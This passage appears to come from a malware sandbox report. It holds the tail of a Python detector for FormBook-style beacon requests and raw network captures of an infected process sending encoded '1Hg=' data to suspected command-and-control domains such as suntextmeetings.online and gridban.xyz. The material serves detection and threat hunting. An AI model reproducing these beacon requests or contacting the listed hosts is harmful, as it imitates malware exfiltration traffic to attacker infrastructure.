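    """Hosts contacted by requests judged to be beacons: the network IOCs to hunt for."""
    return {v.host for v in verdicts if v.is_beacon}

def _raw(request_line, *headers, body=""):
    return "\r\n".join([request_line, *headers, "", body])

# Sample input: requests 1 and 2 are taken from sessions 16 and 17 above (headers the
# checks do not read omitted); request 3 is a constructed benign browser request as control.
SAMPLE_REQUESTS = [
    _raw("GET /qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe"
         "+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP0 HTTP/1.1",
         "Host: www.artfulfusionhub.lat", "Connection: close", f"User-Agent: {FORMBOOK_UA}"),
    _raw("POST /39t8/ HTTP/1.1", "Host: www.9muyiutyt.online", "Connection: close",
         "Content-Type: application/x-www-form-urlencoded", "Origin: http://www.9muyiutyt.online",
         "Referer: http://www.9muyiutyt.online/39t8/", f"User-Agent: {FORMBOOK_UA}",
         body="1Hg=x//1AK0qlJsESWRRjjzk+HR0a1p7/CTh9DUN/xDVYrHSARx/KkglatHqml8kbMRfulvmb8jrRX9vBRqFHaZr9fWwlMuK7T6VJ78QN7lO"
              "+jR8woiFY0gl37I2aZfgUykxWOPzS+wZ3Chpc8mKgfl1u7OA7VRnghNvkQrCJtOjgLbZOOXGmSrF0kyv4WMkTyPDR+BO4tE="),
    _raw("GET /index.html HTTP/1.1", "Host: www.example.com", "Connection: keep-alive",
         "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"),
]

if __name__ == "__main__":
    for v in (assess(parse_request(r)) for r in SAMPLE_REQUESTS):
        print("BEACON" if v.is_beacon else "clean ", v.host + v.path, v.hits)
```

Feed it requests reconstructed from a pcap or copied from a report like this one. The parser deliberately splits the body and query without percent-decoding: unquoting first would turn the raw '+' in the base64 into spaces and defeat the single-field check, which is also why a generic form-data parser is the wrong tool for this traffic.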


                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                           21 | 192.168.2.5 | 55159 | 148.66.138.133 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                           Timestamp | Bytes transferred | Direction | Data
                                                           Jul 26, 2024 18:47:30.980041027 CEST | 743 | OUT | POST /1wd4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.suntextmeetings.online
                                                          Origin: http://www.suntextmeetings.online
                                                          Referer: http://www.suntextmeetings.online/1wd4/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 66 65 76 38 55 6b 36 4e 63 36 36 35 56 35 72 73 58 6d 64 39 6a 53 35 59 41 79 53 52 4a 64 6f 41 6a 44 35 54 64 75 46 70 6e 47 2b 6e 68 30 38 4c 38 5a 79 6d 4a 66 45 65 68 55 6c 46 6c 42 76 61 50 79 71 6c 57 65 66 67 55 30 79 61 54 34 50 35 71 66 71 6d 30 57 67 59 70 58 38 37 72 4f 6f 78 68 70 71 4d 2f 45 6c 71 4c 2f 47 75 50 50 66 56 41 4a 44 55 77 59 47 69 71 42 4a 54 49 41 50 55 6a 4e 51 70 63 6a 36 53 5a 49 32 2f 62 43 2f 69 57 65 64 64 5a 65 4f 74 49 54 4e 4c 4c 57 44 4e 4c 32 56 47 4d 67 69 45 54 75 6b 51 57 2f 2b 31 61 64 6a 79 43 6b 36 2f 54 7a 34 63 44 4e 46 6c 67 62 6e 5a 48 7a 45 3d
                                                          Data Ascii: 1Hg=fev8Uk6Nc665V5rsXmd9jS5YAySRJdoAjD5TduFpnG+nh08L8ZymJfEehUlFlBvaPyqlWefgU0yaT4P5qfqm0WgYpX87rOoxhpqM/ElqL/GuPPfVAJDUwYGiqBJTIAPUjNQpcj6SZI2/bC/iWeddZeOtITNLLWDNL2VGMgiETukQW/+1adjyCk6/Tz4cDNFlgbnZHzE=
                                                           Jul 26, 2024 18:47:31.941521883 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:31 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                           Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                           22 | 192.168.2.5 | 55160 | 148.66.138.133 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                           Timestamp | Bytes transferred | Direction | Data
                                                           Jul 26, 2024 18:47:33.567893982 CEST | 763 | OUT | POST /1wd4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.suntextmeetings.online
                                                          Origin: http://www.suntextmeetings.online
                                                          Referer: http://www.suntextmeetings.online/1wd4/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 66 65 76 38 55 6b 36 4e 63 36 36 35 48 6f 62 73 62 6e 64 39 68 79 35 5a 65 69 53 52 44 39 6f 45 6a 44 31 54 64 73 70 35 6d 30 4b 6e 67 56 4d 4c 74 6f 79 6d 49 66 45 65 30 6b 6c 63 6f 68 76 72 50 79 57 48 57 61 62 67 55 30 6d 61 54 39 72 35 71 4d 43 6c 79 57 67 57 6c 33 38 44 6c 75 6f 78 68 70 71 4d 2f 45 78 41 4c 37 71 75 50 2b 76 56 44 73 76 54 7a 59 47 68 74 42 4a 54 4d 41 50 51 6a 4e 52 4f 63 6e 69 6f 5a 4c 4f 2f 62 48 44 69 57 4d 6c 61 53 65 4f 33 45 44 4d 34 50 69 62 41 44 67 6c 55 48 32 75 47 4b 73 6b 34 54 4a 54 66 41 2f 72 61 52 45 57 48 44 67 77 72 53 39 6b 4d 36 34 33 70 5a 6b 53 46 37 67 37 4b 2f 50 66 6b 57 7a 6f 6a 48 56 35 65 56 67 6f 5a
                                                          Data Ascii: 1Hg=fev8Uk6Nc665Hobsbnd9hy5ZeiSRD9oEjD1Tdsp5m0KngVMLtoymIfEe0klcohvrPyWHWabgU0maT9r5qMClyWgWl38DluoxhpqM/ExAL7quP+vVDsvTzYGhtBJTMAPQjNROcnioZLO/bHDiWMlaSeO3EDM4PibADglUH2uGKsk4TJTfA/raREWHDgwrS9kM643pZkSF7g7K/PfkWzojHV5eVgoZ
                                                           Jul 26, 2024 18:47:34.529320002 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:34 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                           Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                           23 | 192.168.2.5 | 55161 | 148.66.138.133 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                           Timestamp | Bytes transferred | Direction | Data
                                                           Jul 26, 2024 18:47:36.140595913 CEST | 1780 | OUT | POST /1wd4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.suntextmeetings.online
                                                          Origin: http://www.suntextmeetings.online
                                                          Referer: http://www.suntextmeetings.online/1wd4/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 66 65 76 38 55 6b 36 4e 63 36 36 35 48 6f 62 73 62 6e 64 39 68 79 35 5a 65 69 53 52 44 39 6f 45 6a 44 31 54 64 73 70 35 6d 30 79 6e 67 6e 45 4c 2f 2f 6d 6d 4f 76 45 65 6f 30 6c 42 6f 68 76 4d 50 79 4f 44 57 61 57 56 55 32 65 61 51 62 33 35 39 74 43 6c 68 32 67 57 72 6e 38 34 72 4f 70 72 68 70 36 41 2f 45 68 41 4c 37 71 75 50 38 6e 56 56 4a 44 54 31 59 47 69 71 42 4a 50 49 41 50 34 6a 4e 5a 30 63 6e 76 4b 5a 37 75 2f 62 6e 7a 69 55 35 4a 61 52 2b 4f 78 48 44 4d 67 50 6e 43 41 44 67 52 59 48 32 7a 6a 4b 75 6b 34 52 65 71 6d 58 37 6a 58 46 56 47 61 58 69 55 31 48 59 4a 31 36 4f 69 5a 57 6b 4b 7a 78 77 76 5a 34 36 6a 53 57 52 70 45 51 69 39 34 46 30 42 45 56 39 48 59 51 34 43 35 77 6a 4e 4e 58 47 33 4f 5a 2f 65 53 47 49 2b 6e 44 51 78 72 39 49 52 69 53 51 58 6d 61 45 4b 38 2b 54 46 45 6b 4d 44 52 78 48 48 6b 65 6b 67 76 43 76 75 44 47 59 54 38 42 43 6c 46 42 6d 33 4c 5a 63 32 4b 58 51 53 67 34 66 75 62 76 6d 48 52 42 72 37 70 66 76 55 72 45 56 4c 6d 6f 76 2f 70 42 56 46 78 44 48 57 57 62 4e [TRUNCATED]
                                                          Data Ascii: 1Hg= [TRUNCATED]
                                                          Jul 26, 2024 18:47:37.379759073 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:36 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.5 | 55162 | 148.66.138.133 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:47:38.712620974 CEST | 476 | OUT | GET /1wd4/?1Hg=ScHcXTKAO5eSE6uaWkYIjyQnfQ68P9tZ9TtcMsVrul6RoGZN9pvJIdRIgUxQy3rdaSGeQ+CIaUiYSa72rbvJ1wEunXVWpcUP89m8x1dRGPimMbT7bK/R3/HUlg93LDGrxg==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.suntextmeetings.online
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:47:39.672660112 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:39 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.5 | 55163 | 162.254.38.56 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:47:44.784499884 CEST | 710 | OUT | POST /hheq/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.gridban.xyz
                                                          Origin: http://www.gridban.xyz
                                                          Referer: http://www.gridban.xyz/hheq/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 44 53 76 44 51 2b 45 79 6a 4d 30 52 33 4d 39 4a 36 52 70 75 79 69 46 38 68 34 48 67 77 59 41 4c 41 66 65 53 51 65 44 6a 6d 44 78 45 52 54 6e 36 63 48 63 61 6b 79 4d 74 4c 32 50 74 6c 48 50 77 4c 42 49 36 68 35 75 55 52 39 39 65 46 65 38 54 32 35 33 31 43 42 4a 38 4f 61 46 35 5a 51 33 42 36 6e 5a 7a 38 71 43 52 47 42 46 53 64 42 6f 31 48 63 76 75 6a 63 38 4e 54 51 32 65 4e 76 66 4d 37 41 6d 45 45 4d 57 33 6d 32 44 5a 32 59 56 68 48 79 77 75 78 4e 46 53 76 58 64 31 67 54 2f 53 6c 5a 44 6f 75 55 58 68 5a 35 32 31 46 37 66 41 52 34 7a 68 65 77 73 5a 46 36 4a 70 4b 33 5a 61 7a 6d 33 32 50 5a 30 3d
                                                          Data Ascii: 1Hg=DSvDQ+EyjM0R3M9J6RpuyiF8h4HgwYALAfeSQeDjmDxERTn6cHcakyMtL2PtlHPwLBI6h5uUR99eFe8T2531CBJ8OaF5ZQ3B6nZz8qCRGBFSdBo1Hcvujc8NTQ2eNvfM7AmEEMW3m2DZ2YVhHywuxNFSvXd1gT/SlZDouUXhZ521F7fAR4zhewsZF6JpK3Zazm32PZ0=
                                                          Jul 26, 2024 18:47:45.465374947 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:45 GMT
                                                          Server: Apache
                                                          Content-Length: 16052
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                          Jul 26, 2024 18:47:45.465393066 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                          Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                          Jul 26, 2024 18:47:45.465401888 CEST | 448 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                          Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                          Jul 26, 2024 18:47:45.467727900 CEST | 1236 | IN | Data Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                          Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                          Jul 26, 2024 18:47:45.467737913 CEST | 1236 | IN | Data Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                          Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                          Jul 26, 2024 18:47:45.471170902 CEST | 1236 | IN | Data Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                          Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                          Jul 26, 2024 18:47:45.471180916 CEST | 1236 | IN | Data Raw: 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e 34 34 39 35 31 20 2d 32 2e 35 33 33 38 33 2c 31 39 2e 39 31 37 32 35 20
                                                          Data Ascii: 3,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
                                                          Jul 26, 2024 18:47:45.474961042 CEST | 1236 | IN | Data Raw: 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22
                                                          Data Ascii: butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.17282 -7.40283,31.41665 -2.187847,10.24384 -3.955407,20.14218 -5.074975,26.03483
